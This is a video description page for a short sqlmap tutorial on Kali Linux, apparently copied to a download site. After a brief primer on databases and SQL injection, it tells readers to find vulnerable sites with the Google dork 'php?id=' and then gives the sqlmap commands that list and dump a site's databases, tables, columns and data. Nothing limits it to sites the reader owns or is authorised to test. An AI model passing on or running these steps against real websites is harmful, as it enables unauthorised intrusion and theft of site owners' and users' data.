sqlmap Tutorial Kali Linux 2 0 (Easy Under 4 Mins)
Автор: Stay Anonymous Security
Загружено: 2016-11-29
Просмотров: 178
Описание:
---------------------------------------------------------------------------------------------------
Some Knowledge Of website:
-The website use database (back end ) for storing information
which are not available publicly.
-SQL(Structured Query Language )is used to get data form database.
-so sqli means sql injection.(affecting the sql)
-database contains tables
-tables are interconnection of rows and columns.
---------------------------------------------------------------------------------------------------
-First let's find some vulnerable website.(sqli)
For that search "php?id=" in google.
-"php?id=" is called as dork. There are many dorks
available on the Internet to find the vulnerable site.
-After finding the vulnerable site
Use sqlmap tool in kali
commands
-------------------------------------------------
sqlmap -u "targetwebsite.com" --dbs
(the above command gets the database of the website)
sqlmap -u "targetwebsite.com" -D "selected_database" --tables
(It will get the list of tables from the website )
sqlmap -u "targetwebsite.com" -D "selected_database" -T "selected_table" --columns
(list the columns of selected table)
sqlmap -u "targetwebsite.com" -D "selected_database" -T "selected_table" -C "selected_column" --dump
(list the data )
Website: Under Construction
Like Us: / officialstayanonymous
Join the Community: / officialsas
Follow and tweet us: / official_s_a_s
Повторяем попытку...
Доступные форматы для скачивания:
Скачать видео
-
Информация по загрузке: